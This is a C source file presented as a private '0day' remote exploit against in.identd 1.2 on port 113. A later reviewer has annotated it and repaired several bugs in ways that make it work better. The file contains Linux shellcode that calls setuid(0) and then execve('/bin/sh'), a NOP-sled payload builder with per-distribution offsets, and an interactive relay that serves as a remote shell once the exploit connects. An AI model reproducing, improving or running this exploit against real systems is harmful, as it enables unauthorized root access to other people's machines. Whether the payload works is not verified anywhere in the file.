/*
* identd-0day.c - in.identd 1.2 remote exploit
*
* by japboy <hacker.bob@sc.am>
*
* Compile: gcc -o identd-0day identd-0day.c
*
* PRIVATE PRIVATE PRIVATE PRIVATE
* 0DAY 0DAY 0DAY 0DAY 0DAY
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Command string the author evidently meant to run on the target.
 * NOTE(review): no code in this file ever writes this string to the socket;
 * the interactive relay in sh() is the only path by which commands reach
 * the remote side. */
#define COMMAND "uname -a;id;uptime;"

/* 44-byte i386 Linux payload that sendshellcode() copies to the tail of its
 * 512-byte buffer. It contains no NUL byte, so strlen() measures all 44 bytes.
 * Reviewer's reading of the bytes (confirm with a disassembler):
 *   31 db 89 d8 b0 17 cd 80  xor ebx,ebx; mov eax,ebx; mov al,23; int 0x80  -> setuid(0)
 *   eb 16                    jmp short to the call at the end
 *   31 db 31 c9 f7 e1 5b     xor ebx,ebx; xor ecx,ecx; mul ecx; pop ebx     (ebx = &"/bin/sh", edx = 0)
 *   b0 0b 88 53 07           mov al,11; mov [ebx+7],dl                      (NUL-terminates the path at run time)
 *   52 53 89 e1 cd 80        push edx; push ebx; mov ecx,esp; int 0x80      -> execve("/bin/sh", {path, NULL}, NULL)
 *   b0 01 cd 80              mov al,1; int 0x80                             -> exit
 *   e8 e5 ff ff ff           call back to the xor ebx,ebx above (pushes the string address)
 *   "/bin/sh"                path; its terminator is written by the store above
 * Within this file the bytes are only read (strlen/memcpy); nothing executes
 * them locally. */
char *shellcode="\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x16\x31\xdb\x31"
"\xc9\xf7\xe1\x5b\xb0\x0b\x88\x53\x07\x52\x53\x89\xe1\xcd\x80"
"\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";

/* Per-target parameters, selected by the [os] argument as an index into oss[].
 * `name` is what usage() prints; `offset` is the value whose bytes
 * sendshellcode() appends to its payload. `chunk` is not read anywhere in
 * this file. */
struct os {
    char *name;
    int offset;
    int chunk;
};

struct os oss[] = {
    { .name = "Red Hat 8.0 (Psyche)", .offset = 0x8622067, .chunk = 0x420158d4 },
    { .name = "Slackware 8.1",        .offset = 0x86f3d61, .chunk = 0x420158d4 },
    { .name = "Mandrake Linux 8.2",   .offset = 0x8622079, .chunk = 0x420158d4 },
};

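/* Print the synopsis for program name `a` (argv[0]; NULL is tolerated) and
 * one menu line per oss[] entry, numbered by the index the [os] argument
 * takes. The count is derived from the table rather than the hard-coded 3 of
 * the original, so editing the table cannot leave the menu stale. Writes to
 * stdout. */
void usage(char *a) {
    size_t count = sizeof(oss) / sizeof(oss[0]);
    size_t i;

    printf("%s [host] [os]\n", a ? a : "identd-0day");
    for (i = 0; i < count; i++) {
        printf("\t%zu - %s\n", i, oss[i].name);
    }
}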

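/* Build the payload the original author laid out and write all of it to sock.
 *
 * Layout (byte-for-byte what the original constructed; only the bounds around
 * it are repaired):
 *   [0, 512 - strlen(shellcode))   0x90 NOP filler
 *   [.., 512)                      shellcode, copied last so it ends at 512
 *   [512, 522)                     ten bytes of 0x90 - 0x88 = 0x08
 *   [522, 531)                     for j = 2, 1, 0: byte j of .offset of
 *                                  oss[ost], oss[ost+1], oss[ost+2]
 *
 * Defects in the original corrected here:
 *   - buffer was 512 bytes but 531 were written into it (memset of size+10,
 *     then 19 stores past the end): a stack overflow in the tool itself;
 *   - only 512 bytes were handed to write(), so the 19-byte trailer above was
 *     never transmitted; the whole buffer is sent now, looping on short writes;
 *   - `for(;;)` bound only the printf after it, so the function spun forever
 *     printing "[x] Sent: ..." and never reached write();
 *   - write()'s result was stored in an unsigned int, so `< 0` never fired;
 *   - oss[ost+1] and oss[ost+2] were read without checking the table size.
 *
 * NOTE(review): whether this layout overwrites anything useful on the target
 * cannot be determined from this file — the trailer is three-byte slices of
 * three different table entries and .chunk is never used — so treat it as the
 * author's unverified payload. The old "[x] Sent: <COMMAND>" message is gone
 * because COMMAND was never written to the socket.
 *
 * sock: connected TCP socket.  ost: index of the selected oss[] entry; the two
 * entries after it must exist as well.  Exits with status 1 on any failure.
 */
void sendshellcode(int sock, int ost) {
    enum { SLED = 512, PAD = 10, TRAILER = 3 * 3 };
    unsigned char buffer[SLED + PAD + TRAILER];
    size_t count = sizeof(oss) / sizeof(oss[0]);
    size_t sclen = strlen(shellcode);
    size_t p = SLED;
    size_t off = 0;
    int i, j;

    if (sclen > SLED) {
        fprintf(stderr, "[x] Shellcode (%zu bytes) does not fit in %d bytes\n", sclen, SLED);
        exit(1);
    }
    if (ost < 0 || (size_t)ost + 3 > count) {
        fprintf(stderr, "[x] OS index %d needs three table entries, %zu available\n", ost, count);
        exit(1);
    }

    memset(buffer, 0x90, sizeof(buffer));            /* NOP filler everywhere first */
    memcpy(buffer + SLED - sclen, shellcode, sclen); /* shellcode ends exactly at SLED */

    for (i = 0; i < PAD; i++)
        buffer[p++] -= 0x88;                         /* 0x90 - 0x88 = 0x08 */
    for (j = 2; j >= 0; j--)
        for (i = 0; i < 3; i++)
            buffer[p++] = ((unsigned char *)&oss[ost + i].offset)[j];

    while (off < sizeof(buffer)) {
        ssize_t n = write(sock, buffer + off, sizeof(buffer) - off);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            perror("[x] Unable to send shellcode");
            exit(1);
        }
        off += (size_t)n;
    }
    printf("[x] Sent %zu byte payload\n", off);
}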

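/* Relay between the local terminal and whatever is on the far end of sock.
 *
 * Each pass waits with select() on stdin and sock: a line typed on stdin is
 * written to sock, and bytes arriving on sock are copied to stdout. Returns
 * when the peer closes (read() == 0), on a read/write/select error, or on EOF
 * from stdin.
 *
 * Defects in the original corrected here:
 *   - rset was never FD_ZERO'd, so select() saw whatever bits the stack held;
 *   - select()'s result was ignored (EINTR now retries, other errors return);
 *   - read() could fill all 1024 bytes and leave no terminator for fputs();
 *     the received bytes are now written with fwrite() using the count, which
 *     also keeps any NUL bytes the peer sends;
 *   - fgets() returning NULL (EOF on stdin) wrote an empty line forever;
 *   - write()'s return was never checked; short writes are now completed.
 */
void sh(int sock) {
    char rcv[1024];
    int in = fileno(stdin);
    int maxfd = (in > sock ? in : sock) + 1;

    for (;;) {
        fd_set rset;

        FD_ZERO(&rset);
        FD_SET(in, &rset);
        FD_SET(sock, &rset);

        if (select(maxfd, &rset, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            perror("select");
            return;
        }

        if (FD_ISSET(in, &rset)) {
            size_t len, done = 0;

            if (fgets(rcv, sizeof(rcv) - 2, stdin) == NULL) {
                printf("Good Bye!\n");
                return;
            }
            len = strlen(rcv);
            while (done < len) {
                ssize_t w = write(sock, rcv + done, len - done);
                if (w < 0) {
                    if (errno == EINTR)
                        continue;
                    perror("write");
                    return;
                }
                done += (size_t)w;
            }
        }

        if (FD_ISSET(sock, &rset)) {
            ssize_t n = read(sock, rcv, sizeof(rcv));

            if (n == 0) {
                printf("Good Bye!\n");
                return;
            }
            if (n < 0) {
                if (errno == EINTR)
                    continue;
                perror("read");
                return;
            }
            fwrite(rcv, 1, (size_t)n, stdout);
            fflush(stdout); /* keep interactive output prompt-aligned */
        }
    }
}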

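/* Entry point: identd-0day HOST OS_INDEX
 *
 * Resolves HOST (dotted quad or name), connects to TCP port 113, hands the
 * socket to sendshellcode() and then to the interactive relay sh(). Exit
 * status is 1 on a usage, resolution, socket or connect error and 0 once
 * sh() returns.
 *
 * Defects in the original corrected here:
 *   - argc was checked only for the host, so a missing OS argument made
 *     atol(argv[2]) dereference NULL;
 *   - `if (ost > 0) ost = 0;` forced index 0 whatever was typed, so the menu
 *     entries usage() advertises were silently ignored; the index is now parsed
 *     with strtol and rejected with a message when it is not usable;
 *   - connect()'s result went into an unsigned int, so `< 0` could never
 *     detect a failed connection and the program went on to write to an
 *     unconnected socket;
 *   - inet_addr() was used for the dotted-quad test, which confuses
 *     255.255.255.255 with its error value; inet_aton() is used instead;
 *   - the sockaddr_in was never zeroed, and gethostbyname()'s address family
 *     and length were not checked before copying into sin_addr;
 *   - errors exited with status 0; the socket was never closed.
 *
 * NOTE(review): sendshellcode() reads oss[ost], oss[ost+1] and oss[ost+2], so
 * the index must leave two entries after it; with the present three-entry
 * table only 0 qualifies, which is enforced here rather than papered over as
 * the original did.
 */
int main(int argc, char **argv) {
    int sock;
    long ost;
    char *end;
    size_t count = sizeof(oss) / sizeof(oss[0]);
    struct sockaddr_in in;
    struct hostent *hp;

    if (argc < 3) {
        usage(argv[0]);
        return 1;
    }

    errno = 0;
    ost = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || ost < 0 || (size_t)ost + 3 > count) {
        fprintf(stderr, "[x] OS index must be in 0..%zu and leave two table entries after it\n", count - 1);
        usage(argv[0]);
        return 1;
    }

    memset(&in, 0, sizeof(in));
    in.sin_family = AF_INET;
    in.sin_port = htons(113);
    if (inet_aton(argv[1], &in.sin_addr) == 0) {
        hp = gethostbyname(argv[1]);
        if (hp == NULL || hp->h_addrtype != AF_INET || (size_t)hp->h_length != sizeof(in.sin_addr)) {
            printf("[x] Error resolving host\n");
            return 1;
        }
        memcpy(&in.sin_addr, hp->h_addr, sizeof(in.sin_addr));
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("[x] Error creating socket");
        return 1;
    }

    printf("[x] Trying to connect\n");
    if (connect(sock, (struct sockaddr *)&in, sizeof(in)) < 0) {
        perror("[x] Error connecting to host");
        close(sock);
        return 1;
    }
    printf("[x] Connected....\n");

    sendshellcode(sock, (int)ost);
    sh(sock);
    close(sock);
    return 0;
}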

// Bulgarian DarkNet [200x]
// http://DarkNet.pH/